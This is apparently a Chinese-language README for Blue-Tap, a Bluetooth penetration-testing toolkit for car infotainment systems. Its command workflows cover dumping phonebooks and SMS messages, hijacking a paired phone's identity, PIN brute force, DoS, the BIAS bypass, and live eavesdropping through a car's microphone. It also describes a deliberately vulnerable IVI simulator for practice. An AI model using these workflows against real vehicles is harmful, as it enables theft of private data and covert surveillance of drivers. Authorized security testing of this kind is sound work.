### 先决条件
| 需求 | 用途 |
|-------------|---------|
| Linux(推荐 Kali) | BlueZ Bluetooth 协议栈 |
| Python 3.10+ | 运行时环境 |
| BlueZ 5.x | Bluetooth 协议栈 |
| Bluetooth adapter | HCI 接口(内置或 USB dongle) |
| Root 权限 | 原始 L2CAP/RFCOMM、适配器控制、btmon 所需 |
**推荐的适配器:**
- **CSR8510**(约 $5 USB dongle)— 支持传统 PIN、MAC 欺骗、所有功能
- **BCM20702** — 良好的替代 USB dongle
- **Intel AX200/210** — 内置笔记本适配器(强制 SSP,无 MAC 欺骗)
### 安装
```
# 1. 安装系统依赖 (Kali / Ubuntu / Debian)
sudo apt update
sudo apt install -y bluez bluez-tools python3-pip python3-dev \
libbluetooth-dev libdbus-1-dev libglib2.0-dev
# 2. 克隆仓库
git clone https://github.com/Indspl0it/blue-tap.git
cd blue-tap
# 3. 安装 Blue-Tap
pip install -e ".[fuzz]" # With fuzzing support (scapy)
# 或
pip install -e ".[fuzz,audio]" # With fuzzing + audio (scapy + pulsectl)
# 或
pip install -e "." # Core only
# 4. 验证安装
blue-tap --version
blue-tap adapter list
```
### 可选:启用 BlueZ 兼容模式
`sdptool`(SDP 浏览)和某些 SDP fuzzing 操作需要:
```
# 将 --compat 添加到 bluetoothd ExecStart 行
sudo sed -i 's|ExecStart=.*/bluetoothd|& --compat|' /lib/systemd/system/bluetooth.service
sudo systemctl daemon-reload
sudo systemctl restart bluetooth
# 验证
sdptool browse local # Should not show "Failed to connect to SDP server"
```
### 首次扫描
```
# 检查适配器是否可用
blue-tap adapter list
# 发现附近的蓝牙设备
sudo blue-tap scan classic
# 如果您看到目标设备:
sudo blue-tap recon sdp
sudo blue-tap vulnscan
```
## 使用指南
### 全局选项
```
blue-tap [OPTIONS] COMMAND [ARGS]...
Options:
--version Show version and exit
-v, --verbose Verbosity: -v verbose, -vv debug
-s, --session TEXT Session name (default: auto-generated timestamp)
--help Show help and exit
```
### 命令参考
```
blue-tap --help
Commands:
adapter HCI Bluetooth adapter management
at AT command data extraction via RFCOMM
audio Audio capture, injection, and eavesdropping via PulseAudio
auto Automated: discover phone, hijack IVI, dump data, report
avrcp AVRCP media control and attacks
bias BIAS attack — bypass authentication via role-switch (CVE-2020-10135)
dos DoS attacks and pairing abuse
fuzz Protocol fuzzing — campaign mode, legacy fuzzers, crash management
hfp Hands-Free Profile — call audio interception and injection
hijack Full IVI hijack: spoof phone identity and extract data
map Message Access Profile — download SMS/MMS messages
opp Object Push Profile — push files to IVI
pbap Phone Book Access Profile — download phonebook and call logs
recon Service enumeration and device fingerprinting
report Generate pentest report from the current session
run Execute multiple blue-tap commands in sequence
scan Discover Bluetooth Classic and BLE devices
session Manage assessment sessions
spoof MAC address spoofing and device impersonation
vulnscan Scan target for vulnerabilities and attack-surface indicators
```
### 获取任何命令的帮助
```
blue-tap --help # Group help
blue-tap --help # Subcommand help
# 示例:
blue-tap fuzz --help # Shows all fuzz subcommands
blue-tap fuzz campaign --help # Campaign options and examples
blue-tap recon --help # All recon subcommands
```
## 工作流程
### 工作流程 1:快速 IVI 评估
最小化评估 — 发现、指纹识别、漏洞扫描。
```
# 启动命名会话
blue-tap -s quick-assessment scan classic
# 记下扫描结果中的 IVI MAC 地址
blue-tap -s quick-assessment recon sdp AA:BB:CC:DD:EE:FF
blue-tap -s quick-assessment recon fingerprint AA:BB:CC:DD:EE:FF
blue-tap -s quick-assessment vulnscan AA:BB:CC:DD:EE:FF
blue-tap -s quick-assessment report
```
### 工作流程 2:全面 IVI 渗透测试
包含数据提取和 Fuzzing 的综合评估。
```
# 阶段 1:发现与侦察
blue-tap -s full-pentest scan classic
blue-tap -s full-pentest scan ble
blue-tap -s full-pentest recon sdp AA:BB:CC:DD:EE:FF
blue-tap -s full-pentest recon fingerprint AA:BB:CC:DD:EE:FF
blue-tap -s full-pentest recon rfcomm-scan AA:BB:CC:DD:EE:FF
blue-tap -s full-pentest recon l2cap-scan AA:BB:CC:DD:EE:FF
blue-tap -s full-pentest recon gatt AA:BB:CC:DD:EE:FF
blue-tap -s full-pentest recon pairing-mode AA:BB:CC:DD:EE:FF
# 阶段 2:漏洞评估
blue-tap -s full-pentest vulnscan AA:BB:CC:DD:EE:FF
# 阶段 3:数据提取
blue-tap -s full-pentest pbap dump AA:BB:CC:DD:EE:FF
blue-tap -s full-pentest map dump AA:BB:CC:DD:EE:FF
blue-tap -s full-pentest at dump AA:BB:CC:DD:EE:FF
# 阶段 4:连接劫持 (如果已知手机 MAC)
blue-tap -s full-pentest hijack AA:BB:CC:DD:EE:FF CC:DD:EE:FF:00:11
# 阶段 5:Protocol fuzzing
blue-tap -s full-pentest fuzz campaign AA:BB:CC:DD:EE:FF \
--duration 30m --strategy targeted --capture
# 阶段 6:报告
blue-tap -s full-pentest report -f html
```
### 工作流程 3:劫持与提取
针对性攻击 — 冒充机主的手机并窃取数据。
```
# 1. 找到 IVI 和配对的手机
blue-tap scan classic # Find "SYNC" or similar car name
blue-tap scan classic # Run again; note phones near the car
# 2. 枚举 IVI
blue-tap recon sdp AA:BB:CC:DD:EE:FF
blue-tap recon rfcomm-scan AA:BB:CC:DD:EE:FF
# 3. 执行劫持
blue-tap hijack AA:BB:CC:DD:EE:FF CC:DD:EE:FF:00:11 \
--phone-name "John's iPhone"
# 所有数据已保存至 hijack 输出目录
```
### 工作流程 4:Fuzzing Campaign
带有崩溃分析的扩展协议 Fuzzing。
```
# 生成 seed corpus
blue-tap fuzz corpus generate
# 运行带有捕获功能的 1 小时定向 campaign
blue-tap -s fuzz-session fuzz campaign AA:BB:CC:DD:EE:FF \
-p sdp -p rfcomm -p obex-pbap \
--strategy targeted \
--duration 1h \
--capture
# 查看崩溃
blue-tap fuzz crashes list
blue-tap fuzz crashes show 1
# 最小化崩溃
blue-tap fuzz minimize 1 --strategy ddmin
# 重放以验证
blue-tap fuzz crashes replay 1
# 尝试已知的 CVE 模式
blue-tap fuzz cve AA:BB:CC:DD:EE:FF
# 导出结果
blue-tap fuzz crashes export
blue-tap -s fuzz-session report
```
### 工作流程 5:Playbook 自动化
创建可重复使用的渗透测试 playbook。
**`ivi-pentest.txt`:**
```
scan classic
recon sdp TARGET
recon fingerprint TARGET
recon rfcomm-scan TARGET
recon l2cap-scan TARGET
recon gatt TARGET
vulnscan TARGET
pbap dump TARGET
map dump TARGET
report
```
```
blue-tap -s auto-pentest run --playbook ivi-pentest.txt
```
### 工作流程 6:音频窃听
```
# 连接并切换到 HFP profile 以获取麦克风访问权限
blue-tap hfp connect AA:BB:CC:DD:EE:FF
blue-tap audio profile AA:BB:CC:DD:EE:FF hfp
# 实时监听 (车载麦克风 → 笔记本扬声器)
blue-tap audio live AA:BB:CC:DD:EE:FF
# 或录制到文件
blue-tap audio record-mic AA:BB:CC:DD:EE:FF
# 捕获媒体流
blue-tap audio profile AA:BB:CC:DD:EE:FF a2dp
blue-tap audio capture AA:BB:CC:DD:EE:FF
# 查看捕获的音频
blue-tap audio list
blue-tap audio review
```
## 漏洞 IVI 模拟器
Blue-Tap 附带一个配套的 **Vulnerable IVI Simulator**,位于 `target/` 目录中。这是一个真实的 Bluetooth 目标(而非模拟),可在任何带有 Bluetooth 适配器的 Linux 机器上运行,其行为类似于故意存在漏洞的车载信息娱乐系统。
### 目的
- 针对真实目标练习 Blue-Tap 命令
- 在受控环境中演示所有攻击向量
- 在无法接触真实车辆的情况下验证工具功能
### 快速设置
需要一台 **单独的 Linux 机器**(Kali 笔记本电脑、Raspberry Pi 或带有 Bluetooth 适配器的台式机)。
```
# 终端 1 — 配置适配器
cd target/
sudo ./setup_ivi.sh
# 终端 2 — 启动配对代理
sudo python3 pin_agent.py
# 终端 3 — 启动 IVI 守护进程
sudo python3 ivi_daemon.py
# 可选终端 4 — BLE GATT 服务器
sudo python3 ble_gatt.py
```
### 暴露的服务
| 服务 | Channel/PSM | 数据 |
|---------|-------------|------|
| PBAP (Phonebook) | RFCOMM 15 | 50 个联系人、通话记录 |
| MAP (Messages) | RFCOMM 16 | 20 条 SMS 消息 |
| OPP (Object Push) | RFCOMM 9 | 接受任何文件 |
| HFP (Hands-Free) | RFCOMM 10 | 完整 SLC 握手 |
| SPP (Serial Port) | RFCOMM 1 | AT 命令响应器 |
| Hidden Debug | RFCOMM 2 | 不在 SDP 中 |
| BNEP (PAN) | L2CAP 7 | Fuzz absorber |
| AVCTP (AVRCP) | L2CAP 23 | Fuzz absorber |
| AVDTP (A2DP) | L2CAP 25 | Fuzz absorber |
| BLE GATT | Multiple | Device Info + Battery + Custom IVI |
### 内置漏洞
| 漏洞 | 什么 Blue-Tap 命令可以发现它 |
|---------------|-------------------------------|
| Unauthenticated OBEX | `blue-tap vulnscan` → CRITICAL |
| Legacy PIN "1234" | `blue-tap dos pin-brute` |
| Just Works pairing (SSP) | `blue-tap vulnscan` → HIGH |
| No PIN rate limiting | `blue-tap vulnscan` → MEDIUM |
| Hidden RFCOMM channel | `blue-tap vulnscan` → MEDIUM |
| Permissive AT commands | `blue-tap at connect` |
| Unauthenticated BLE writes | `blue-tap recon gatt` |
| Hijack-vulnerable bond | `blue-tap hijack` |
有关详细的设置说明、架构图和平台特定说明,请参阅 [`target/README.md`](target/README.md)。
## 故障排除
### 适配器问题
**"No adapters found" / "Adapter not found"**
```
# 检查适配器是否存在
hciconfig -a
# 如果 rfkill 正在阻止
rfkill list bluetooth
rfkill unblock bluetooth
# 如果无法识别 USB 适配器
lsusb | grep -i bluetooth
# 手动启动适配器
sudo hciconfig hci0 up
```
**"Operation not permitted"**
```
# 大多数 Blue-Tap 命令需要 root 权限
sudo blue-tap scan classic
# 或设置 capabilities (sudo 的替代方案)
sudo setcap cap_net_raw,cap_net_admin+eip $(which python3)
```
### 扫描问题
**"No devices found"**
- 确保目标是可发现的(在目标上运行 `hciconfig hci0 | grep PSCAN`)
- 增加扫描持续时间:`blue-tap scan classic -d 30`
- 尝试从更近的距离(Bluetooth 范围约 10m)
- 检查 RF 干扰
**BLE scan shows no results**
- 确保 BLE 已启用:`sudo btmgmt le on`
- 尝试被动模式:`blue-tap scan ble --passive`
- 某些适配器需要在 btmgmt 中显式启用 LE
### 连接问题
**"Connection refused" on RFCOMM**
- 目标服务可能需要先配对
- 检查通道是否正确:`blue-tap recon rfcomm-scan `
- 服务可能已被注销
**"Permission denied" on L2CAP**
- 低于 4096 的 L2CAP PSM 需要 root 权限:`sudo blue-tap ...`
- 检查 PSM 是否被内核阻止:`cat /proc/sys/net/bluetooth/l2cap_enable_ertm`
**Pairing failures**
- 检查配对模式:`blue-tap recon pairing-mode `
- 对于 SSP 设备,PIN 暴力破解无效
- 尝试 `blue-tap recon ssp ` 进行验证
### SDP 问题
**"Failed to connect to SDP server"**
```
# 启用 BlueZ 兼容模式
sudo sed -i 's|ExecStart=.*/bluetoothd|& --compat|' /lib/systemd/system/bluetooth.service
sudo systemctl daemon-reload
sudo systemctl restart bluetooth
```
### Fuzzing 问题
**"scapy not found"**
```
# 安装 fuzzing 依赖
pip install -e ".[fuzz]"
# 或
pip install scapy>=2.5
```
**"No crash database found"**
- 首先运行 Fuzzing Campaign 以创建数据库
- 指定会话:`blue-tap fuzz crashes list -s `
**Target becomes unresponsive during fuzzing**
- 增加测试用例之间的 `--delay`:`--delay 2.0`
- 增加崩溃后的 `--cooldown`:`--cooldown 10`
- 使用 `--timeout 5` 降低迭代速率
- 目标的 Bluetooth 协议栈可能需要手动重启
### 音频问题
**"PulseAudio: connection refused"**
```
# 检查 PulseAudio/PipeWire 是否正在运行
pactl info
# 重启音频服务
blue-tap audio restart
# 诊断蓝牙音频路由
blue-tap audio diagnose
```
**No audio sources/sinks visible**
```
blue-tap audio devices
# 如果为空:先配对设备,然后切换 profile
blue-tap audio profile a2dp # or hfp
```
### MAC 欺骗问题
**"bdaddr not found"**
```
# 安装 bdaddr (属于 bluez-tools 或从源码构建)
sudo apt install bluez-tools
# 或
# 从 BlueZ 源码构建 bdaddr
```
**"Cannot change MAC" / "Operation not supported"**
- Intel 适配器通常不支持 MAC 欺骗
- 使用 CSR8510 或 BCM20702 USB dongle
- 某些适配器需要接口处于关闭状态:在欺骗前执行 `sudo hciconfig hci0 down`
### 报告问题
**"No session data found"**
- 确保您一致地使用了 `-s` 标志:`blue-tap -s mytest scan classic`
- 检查会话是否存在:`blue-tap session list`
- 指向特定目录:`blue-tap report ./my_output_dir/`
## 平台说明
### Kali Linux(推荐)
- 预装所有工具(BlueZ, hcitool, sdptool, btmgmt, bluetoothctl)
- bluetoothd 可能需要 `--compat` 标志
- Intel 笔记本适配器强制执行 SSP(无传统 PIN 测试,无 MAC 欺骗)
- 推荐:添加 CSR8510 USB dongle 以获得完整功能访问
### Ubuntu / Debian
```
sudo apt install -y bluez bluez-tools python3-pip python3-dev \
libbluetooth-dev libdbus-1-dev libglib2.0-dev
```
### Raspberry Pi
- Broadcom BCM43xx 适配器支持传统 PIN 模式
- Pi 5: BT 5.2 — 较少依赖于版本的漏洞发现
- Pi 4: BT 5.0 — 功能的良好平衡
- Pi 3: BT 4.2 — 触发更多漏洞扫描发现(KNOB, BLURtooth)
- 非常适合作为 IVI 模拟器目标
### WSL (Windows Subsystem for Linux)
- **不支持** Bluetooth 操作 — WSL 不会透传 USB Bluetooth 适配器
- 使用原生 Linux 安装或具有 USB 直通功能的 VM
### 适配器对比
| 适配器 | MAC 欺骗 | 传统 PIN | BLE | 价格 | 最适合 |
|---------|:----------:|:----------:|:---:|:-----:|----------|
| CSR8510 USB | Yes | Yes | Yes | ~$5 | 全功能测试 |
| BCM20702 USB | Yes | Yes | Yes | ~$10 | CSR 的替代品 |
| Intel AX/210 | No | No (强制 SSP) | Yes | Built-in | 仅限 BLE + 侦察 |
| RTL8761B USB | Partial | Partial | Yes | ~$8 | 预算选项 |
| nRF52840 | N/A | N/A | 仅限嗅探 | ~$10 | BLE 嗅探 |
| USRP B210 | N/A | N/A | Baseband | ~$1500 | 研究级 |
## 许可证
Blue-Tap 基于 **GNU General Public License v3.0** 授权 — 详见 [LICENSE](LICENSE) 文件。
Copyright (C) 2026 Santhosh Ballikonda
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
## 法律免责声明
Blue-Tap 仅供 **授权安全测试和研究目的** 使用。
- 您 **必须** 拥有您测试的任何设备所有者的明确书面许可
- 未经授权访问 Bluetooth 设备根据《计算机欺诈和滥用法》(CFAA)、英国《计算机滥用法》以及全球类似法律均属非法
- 作者不对本工具的滥用承担任何责任
- 始终遵循您组织的交战规则和范围限制
- 向受影响的制造商负责任地报告漏洞
**负责任的披露:** 如果您使用 Blue-Tap 在生产环境 IVI 系统中发现漏洞,请遵循协调披露做法。在公开披露之前,请联系车辆制造商的 PSIRT(产品安全事件响应团队)。
## 作者
**Santhosh Ballikonda** — [@Indspl0it](https://github.com/Indspl0it)标签:A2DP, AVRCP, BLE渗透测试, HFP, HTTP工具, MAC地址欺骗, PBAP, Python安全工具, 中间人攻击, 信息娱乐系统, 协议模糊测试, 安全评估工具包, 密码管理, 拒绝服务攻击, 插件系统, 数据窃取, 汽车信息安全, 汽车黑客, 渗透测试框架, 演示模式, 网络安全, 蓝牙安全, 设备指纹识别, 车载IVI系统, 连接劫持, 逆向工具, 防御, 隐私保护, 音频窃听